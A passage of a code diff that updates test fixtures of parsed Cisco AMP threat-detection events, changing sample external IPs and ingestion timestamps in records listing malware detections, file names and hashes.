@@ -3046,8 +2956,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070192600Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:32.898198600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3069,7 +2979,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3116,7 +3026,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3126,8 +3036,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070194607Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:32.898204500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3149,7 +3059,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3208,7 +3118,7 @@ "f9b02ad8d25157eebdb284631ff646316dc606d5" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3225,8 +3135,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070196717Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", + "ingested": "2021-12-09T13:35:32.898210600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -3248,7 +3158,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3302,7 +3212,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3319,8 +3229,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070198772Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898216500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3342,7 +3252,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3392,7 +3302,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3405,8 +3315,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070200818Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898222500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3428,7 +3338,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3478,7 +3388,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3491,8 +3401,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070202819Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898228400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3514,7 +3424,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3561,7 +3471,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3571,8 +3481,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070204840Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:32.898234200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3594,7 +3504,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3640,7 +3550,7 @@ "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3650,8 +3560,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070206862Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}